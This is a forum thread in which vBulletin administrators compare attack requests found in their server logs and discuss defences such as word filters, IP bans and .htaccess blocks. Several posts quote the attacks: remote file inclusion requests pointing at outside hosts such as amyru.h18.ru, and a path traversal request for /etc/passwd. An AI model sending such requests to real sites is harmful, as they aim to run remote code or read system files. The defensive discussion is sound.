Strange Spider!

It's trying to exploit vBulletin. Don't worry, it can't do it that way(I asked Zachery about it).

We've been getting several of those every day! The IP always changes, but all the URLs are similar. Here's a site that logs attacks, you can see more like it:



They can't get in, but I put the following words in our Censored Words list just to be on the safe side.

{ninaru} {hut2} {ru} {amyru} {h18} {kaos} {r57} {amygirl}

wget is (if you didn't already know) a linux download program.
such as: wget http://path.to/site/file.name
So I think they were trying to download your showthread.php somehow but failed?

I get tons of them. They haven't done anything so far but I'd still wish they'd go away, their long URLs stretch the "Who is online?" page.

Location:
/index.php//vb/faq?cmd=http://someurl.de/img/safe.txt? or /index.php//vb/faq?remote=http://someurl.de/img/safe.txt?
Agent: libwww-perl/5.805

Is it trying to exploit the forum through the FAQ?

looks like it.

any updates on this...?

I got a

showthread.php?t=../../../../../../../etc/passwd

one of these days :P

In my logs I see this:

[27/Jan/2008:01:15:22 +0600]"GET /showthread.php?p=http://amyru.h18.ru/images/cs.txt?

Please advise what to do...

^I get that one a lot, it doesn't really seem to do anything...

These are called site rippers. They could be harmful in many ways. While vBulletin is immune against such kind of attacks, other uses of these rippers is performing DoS attacks by consuming bandwidth via huge number of requests to the server. They could be blocked all by adding them to your domain's .htaccess file. Check this guide for details.

thanks simsim,

According to theplanet security department this is

" is an example of a malicious file being inserted into your content - cs.txt"

he was referring to:

grep =http /usr/local/apache/domlogs/* | grep txt

[27/Jan/2008:01:15:22 +0600]"GET /showthread.php?p=http://amyru.h18.ru/images/cs.txt?

I am really concerned about this as I have heard differing views. Does this mean my server is compromised or the vbulletin is compromised? Is there a fix for this?

Please advise...

Thanks

Tonight i saw them in the forums before they would be in the homepage of my site. I got about 15 web addresses this time around.

As simsim says, these are (very old) kiddie scripts that attempt to exploit a loophole that was inherent in very early versions of BB/forum and/or chat software applications. Basically, the way old parsers used to work was that anything after the URL (php, asp etc) is effectively a parameter list and browsers/applications used to follow these as an execute command. So for instance, if the tagged parameter to a GET was an off-site command list, then the server would attempt to execute it, thus running malicious commands.

As has been said though, the more recent applications take the GET parameter lines as literals (which is why, when developing, it is SOOOO important to ensure that your code correctly and safely parses the GET parameters!!), so consequently the error message is displayed and it goes no further.

It is certainly a bandwidth annoyance, but the more crucial issue about these scripts is that they are run by zombie computers that have already been infected by visiting sites that download malware (generally pr0n or warez sites), and are done in the background without the user's knowledge. These are then used by botmasters to effect DDOS attacks. I've compared many of these script IPs wth those logged during very strong DDOS attacks in the past, and the lists are frighteningly exact in their comparisons.

Of course I place IP bans on them; my htaccess file is currently hitting around 35K, and I expect it to go much higher. I've set my 403.shtml file to explain why it's likely an IP number has been banned, and outlined the steps to take to clean their computer. They can then send an email (appropriately formatted) to me with the results of their anti-virus report and I would then, if I'm convinced, remove the block on the IP.

If its that bad then bann it